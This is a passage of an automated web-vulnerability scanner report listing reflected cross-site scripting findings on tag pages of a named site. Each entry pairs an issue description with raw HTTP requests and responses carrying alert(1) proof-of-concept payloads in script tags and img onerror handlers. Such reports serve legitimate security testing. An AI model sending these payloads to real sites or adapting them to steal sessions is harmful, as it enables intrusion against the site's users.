<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag46e98<script>alert(1)</script>563538ca1e9b65748/phone?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4329. http://www.resellerbase.com/tag/phone [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f1c2f</title><img%20src%3da%20onerror%3dalert(1)>bfa4cf4013e was submitted in the REST URL parameter 2. This input was echoed as f1c2f</title><img src=a onerror=alert(1)>bfa4cf4013e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/phonef1c2f</title><img%20src%3da%20onerror%3dalert(1)>bfa4cf4013e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phonef1c2f</title><img src=a onerror=alert(1)>bfa4cf4013e</title>
...[SNIP]...

2.4330. http://www.resellerbase.com/tag/phone [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57b8e<img%20src%3da%20onerror%3dalert(1)>179524b003f was submitted in the REST URL parameter 2. This input was echoed as 57b8e<img src=a onerror=alert(1)>179524b003f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/phone57b8e<img%20src%3da%20onerror%3dalert(1)>179524b003f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phone
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : phone57b8e<img src=a onerror=alert(1)>179524b003f]</td>
...[SNIP]...

2.4331. http://www.resellerbase.com/tag/phone [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d6fb3</title><img%20src%3da%20onerror%3dalert(1)>5ee8267d8e79d15a4 was submitted in the REST URL parameter 2. This input was echoed as d6fb3</title><img src=a onerror=alert(1)>5ee8267d8e79d15a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/phoned6fb3</title><img%20src%3da%20onerror%3dalert(1)>5ee8267d8e79d15a4?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phoned6fb3</title><img src=a onerror=alert(1)>5ee8267d8e79d15a4</title>
...[SNIP]...

2.4332. http://www.resellerbase.com/tag/phone [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56360<img%20src%3da%20onerror%3dalert(1)>38605fd04b85304bc was submitted in the REST URL parameter 2. This input was echoed as 56360<img src=a onerror=alert(1)>38605fd04b85304bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/phone56360<img%20src%3da%20onerror%3dalert(1)>38605fd04b85304bc?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phone
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : phone56360<img src=a onerror=alert(1)>38605fd04b85304bc]</td>
...[SNIP]...

2.4333. http://www.resellerbase.com/tag/private+label [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/private+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba124<script>alert(1)</script>79acad5a1355c8164 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagba124<script>alert(1)</script>79acad5a1355c8164/private+label?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagba124<script>alert(1)</script>79acad5a1355c8164/private+label?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4334. http://www.resellerbase.com/tag/private+label [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/private+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77893<script>alert(1)</script>0ac08bb9610 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag77893<script>alert(1)</script>0ac08bb9610/private+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag77893<script>alert(1)</script>0ac08bb9610/private+label was not found on this server.</p>
...[SNIP]...

2.4335. http://www.resellerbase.com/tag/private+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28eb0<img%20src%3da%20onerror%3dalert(1)>1b100bcf959f561c9 was submitted in the REST URL parameter 2. This input was echoed as 28eb0<img src=a onerror=alert(1)>1b100bcf959f561c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/private+label28eb0<img%20src%3da%20onerror%3dalert(1)>1b100bcf959f561c9?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: priva
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : private label28eb0<img src=a onerror=alert(1)>1b100bcf959f561c9]</td>
...[SNIP]...

2.4336. http://www.resellerbase.com/tag/private+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e17aa</title><img%20src%3da%20onerror%3dalert(1)>8c1a738d790 was submitted in the REST URL parameter 2. This input was echoed as e17aa</title><img src=a onerror=alert(1)>8c1a738d790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/private+labele17aa</title><img%20src%3da%20onerror%3dalert(1)>8c1a738d790 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: private labele17aa</title><img src=a onerror=alert(1)>8c1a738d790</title>
...[SNIP]...

2.4337. http://www.resellerbase.com/tag/private+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8ae0b</title><img%20src%3da%20onerror%3dalert(1)>304efea908c16f9a was submitted in the REST URL parameter 2. This input was echoed as 8ae0b</title><img src=a onerror=alert(1)>304efea908c16f9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/private+label8ae0b</title><img%20src%3da%20onerror%3dalert(1)>304efea908c16f9a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: private label8ae0b</title><img src=a onerror=alert(1)>304efea908c16f9a</title>
...[SNIP]...

2.4338. http://www.resellerbase.com/tag/private+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c5c2<img%20src%3da%20onerror%3dalert(1)>d22d5607f9e was submitted in the REST URL parameter 2. This input was echoed as 6c5c2<img src=a onerror=alert(1)>d22d5607f9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/private+label6c5c2<img%20src%3da%20onerror%3dalert(1)>d22d5607f9e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: priva
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : private label6c5c2<img src=a onerror=alert(1)>d22d5607f9e]</td>
...[SNIP]...

2.4339. http://www.resellerbase.com/tag/resel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cf61<script>alert(1)</script>9b614158e5ea3f64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag1cf61<script>alert(1)</script>9b614158e5ea3f64/resel?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1cf61<script>alert(1)</script>9b614158e5ea3f64/resel?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4340. http://www.resellerbase.com/tag/resel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20a72<script>alert(1)</script>48c580269cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag20a72<script>alert(1)</script>48c580269cb/resel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag20a72<script>alert(1)</script>48c580269cb/resel was not found on this server.</p>
...[SNIP]...

2.4341. http://www.resellerbase.com/tag/resel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bfa6f</title><img%20src%3da%20onerror%3dalert(1)>65a9a863140224bba was submitted in the REST URL parameter 2. This input was echoed as bfa6f</title><img src=a onerror=alert(1)>65a9a863140224bba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/reselbfa6f</title><img%20src%3da%20onerror%3dalert(1)>65a9a863140224bba?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reselbfa6f</title><img src=a onerror=alert(1)>65a9a863140224bba</title>
...[SNIP]...

2.4342. http://www.resellerbase.com/tag/resel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd9a0<img%20src%3da%20onerror%3dalert(1)>46526dee74f was submitted in the REST URL parameter 2. This input was echoed as dd9a0<img src=a onerror=alert(1)>46526dee74f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseldd9a0<img%20src%3da%20onerror%3dalert(1)>46526dee74f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseldd9a0<img src=a onerror=alert(1)>46526dee74f]</td>
...[SNIP]...

2.4343. http://www.resellerbase.com/tag/resel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b60fd</title><img%20src%3da%20onerror%3dalert(1)>b11f0214e87 was submitted in the REST URL parameter 2. This input was echoed as b60fd</title><img src=a onerror=alert(1)>b11f0214e87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reselb60fd</title><img%20src%3da%20onerror%3dalert(1)>b11f0214e87 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reselb60fd</title><img src=a onerror=alert(1)>b11f0214e87</title>
...[SNIP]...

2.4344. http://www.resellerbase.com/tag/resel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91fc7<img%20src%3da%20onerror%3dalert(1)>5c0b545028827c1d0 was submitted in the REST URL parameter 2. This input was echoed as 91fc7<img src=a onerror=alert(1)>5c0b545028827c1d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/resel91fc7<img%20src%3da%20onerror%3dalert(1)>5c0b545028827c1d0?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resel91fc7<img src=a onerror=alert(1)>5c0b545028827c1d0]</td>
...[SNIP]...

2.4345. http://www.resellerbase.com/tag/resell [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resell

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c248<script>alert(1)</script>376bceaa549f58cde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag4c248<script>alert(1)</script>376bceaa549f58cde/resell?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

